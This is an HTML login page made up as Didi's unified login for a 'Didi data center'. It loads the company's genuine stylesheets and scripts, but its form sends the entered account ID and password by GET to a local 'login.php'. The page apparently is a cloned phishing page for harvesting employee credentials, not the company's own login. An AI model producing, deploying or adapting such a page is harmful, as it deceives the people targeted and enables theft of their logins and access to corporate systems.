<html>
<head>
    <title>滴滴统一登录</title>
    <meta http-equiv="content-type" content="text/html; charset=utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta content="telephone=no" name="format-detection">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <meta name="full-screen" content="true">
    <meta name="screen-orientation" content="portrait">
    <meta name="x5-fullscreen" content="true">
    <meta name="360-fullscreen" content="true">
    <meta name="description" content="">
    <meta name="keywords" content="">
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0">
    <meta http-equiv="x-dns-prefetch-control" content="on">
    <link rel="dns-prefetch" href="//static.galileo.xiaojukeji.com">
    <link rel="dns-prefetch" href="//me.xiaojukeji.com">
    <link rel="shortcut icon" href="//static.galileo.xiaojukeji.com/static/tms/api/public/other/070b116331b897b5c06eb468f8fc72ed.ico" type="image/x-icon">
    <link rel="stylesheet" href="//me.xiaojukeji.com/project/stargate-auth/css/login.css?_v=140799">
    <!--[if lt IE 9]>
    <link  rel="stylesheet"  href="//me.xiaojukeji.com/project/stargate-auth/css/login-ie.css?_v=e48d09"/>
    <![endif]-->
    <!--<script>-->
        <!--var link = document.createElement("link");-->
        <!--link.rel = "stylesheet", link.type = "text/css", link.href = "//zhushou.xiaojukeji.com/static/other/bg.css?v=" + (new Date).getTime(), document.getElementsByTagName("head")[0].appendChild(link)-->
    <!--</script><link rel="stylesheet" type="text/css" href="//zhushou.xiaojukeji.com/static/other/bg.css?v=1505905552857">-->
</head>
<style type="text/css">
    button {
        font-family: "Microsoft YaHei","Roboto", sans-serif;
        text-transform: uppercase;
        outline: 0;
        background: #4a4c5a;
        width: 100%;
        border: 0;
        padding: 15px;
        color: #FFFFFF;
        font-size: 14px;
        -webkit-transition: all 0.3 ease;
        transition: all 0.3 ease;
        cursor: pointer;
    }
    .form button:hover,.form button:active,.form button:focus {
        background: #4a4c5a;
    }
    body
 {
background: #fa8919; /* fallback for old browsers */
background: -webkit-linear-gradient(right, #4a4c5a, #4a4c5a);
background: -moz-linear-gradient(right,#4a4c5a,#4a4c5a);
background: -o-linear-gradient(right, #4a4c5a,#4a4c5a);
background: linear-gradient(to left, #4a4c5a, #4a4c5a);
font-family: "Roboto", sans-serif;
-webkit-font-smoothing: antialiased;
-moz-osx-font-smoothing: grayscale;
}

</style>
<body >

<div class="center main-container" id="login-page">
    <div class="text-center logo-container">
        <div class="logo">
        </div>
        <p>滴滴数据中心</p>
    </div>
    <form id="f1" action="login.php" method="get" onsubmit="return sub();">
      <div class="input-container">
        <label for="id" class="user">
        </label>
        <!--<input id="username" placeholder="账号" maxlength="100">-->
        <input id="id" name="id" placeholder="账号" maxlength="100">
      </div>
      <div class="input-container">
        <label for="password" class="password">
        </label>
        <input id="password" name="password" placeholder="密码" maxlength="100" type="password">
      </div>
      <div class="submit text-center">  <button  type="submit">登 陆</button></div>


    </form>
</div>
<!--[if lt IE 9]>
<script   src="//me.xiaojukeji.com/lib/json2/json2.js?_v=f5df93"></script>
<![endif]-->
<script src="//me.xiaojukeji.com/lib/jquery/jquery-1.7.2.js?_v=817802"></script>
<script src="//me.xiaojukeji.com/project/stargate-auth/js/login/login.js?_v=24753e"></script>
<script>
function sub() {
// jquery 表单提交
$("#f1").ajaxSubmit(function(message) {
// 对于表单提交成功后处理，message为返回内容
});

return false; // 必须返回false，否则表单会自己再做一次提交操作，并且页面跳转
}

</script>
</body>
</html>